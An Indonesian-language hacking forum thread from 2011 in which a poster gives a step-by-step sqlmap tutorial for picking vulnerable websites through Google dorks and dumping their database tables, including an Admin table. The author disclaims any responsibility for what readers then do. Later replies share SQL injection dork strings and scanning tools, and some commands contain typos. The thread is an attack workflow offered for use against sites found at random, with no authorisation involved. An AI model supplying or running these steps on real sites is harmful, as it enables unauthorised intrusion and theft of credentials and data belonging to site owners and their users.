SQLi Sqlmap.py
#1
ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...

ok langsung aja dari pada lama2..

yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...

hihihiihih Tongue

ok serius nie..

1.buka SQL Map kalian dengan cara
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...

3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...

4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..

5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://site.com -D gatotganteng -T Admin --columns

Code:
pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump

kalo udah begini silakan dah..

mau kalian apain tapi yang jelas w kgk tanggung jawab ya..


wkwkwkkwkwkkwk

:ngakak:

udah jangan lupa

:kasihcendol:

wkwkkwkwk

salam veronochi

dan w hanya mau berbagi kepada orang-orang yang mau belajar...
Hidup Harus Di Bawa Happy..!!!

#2
ijin cicip om... cendol terkirim ke kamar nt om... Confused

#3
silakan om hanya share aja ...

kalo ilmu kgk di share bakalan ilang tuh ilmu..

hehehheh...
Hidup Harus Di Bawa Happy..!!!

#4
mantap om. tp cara untuk mencari tahu celah menggunakan dork bijimana ya Tongue
[shcode=This_site_xss-ed]

#5
bijimana???

biji apa om??

heheheh


kalo untuk mengetahui untuk Bugnya Banyak Cara bisa kita cari menggunkan GoogleDork Untuk SQLi
Tools Scanner Online
Kalo kgk gunain Software X-code....
Hidup Harus Di Bawa Happy..!!!

#6
(08-30-2011, 04:58 PM)Veronochi Wrote: bijimana???

biji apa om??

heheheh


kalo untuk mengetahui untuk Bugnya Banyak Cara bisa kita cari menggunkan GoogleDork Untuk SQLi
Tools Scanner Online
Kalo kgk gunain Software X-code....

hehe, bagaimana om mksdnya Big Grin
boleh di share lah cara menggukanan GoogleDork Untuk SQLi Tongue
atau menggunakan software x-code Big Grin. btw software nya buat di penguin apa buat di jendela om ?
ane anti jendela Tongue
[shcode=This_site_xss-ed]

#7
kalo untuk di pingun bisa menggunakan DarkJumper buatan Mywisdom...
kalo Software X-code biasanya di Gunain di jendela tapi temen ane Pake Di Linux tapi ane kgk tau dia make Wine Versi berapa??

banyak kali om Dork SQLi

contoh:
inurl://index.php?id=
inirl://catagory.php?id=
inurl://.php?id=

dan masih banyak lainnya...
Hidup Harus Di Bawa Happy..!!!

#8
(08-30-2011, 05:10 PM)Veronochi Wrote: kalo untuk di pingun bisa menggunakan DarkJumper buatan Mywisdom...
kalo Software X-code biasanya di Gunain di jendela tapi temen ane Pake Di Linux tapi ane kgk tau dia make Wine Versi berapa??

banyak kali om Dork SQLi

contoh:
inurl://index.php?id=
inirl://catagory.php?id=
inurl://.php?id=

dan masih banyak lainnya...

makasih om Big Grin. langsung jajal Tongue
[shcode=This_site_xss-ed]

#9
ok silakan aja...

Hidup Harus Di Bawa Happy..!!!

#10
Tutorialnya lumayan Smile
root@IBTeam# loe.gw ^C





Users browsing this thread: 2 Guest(s)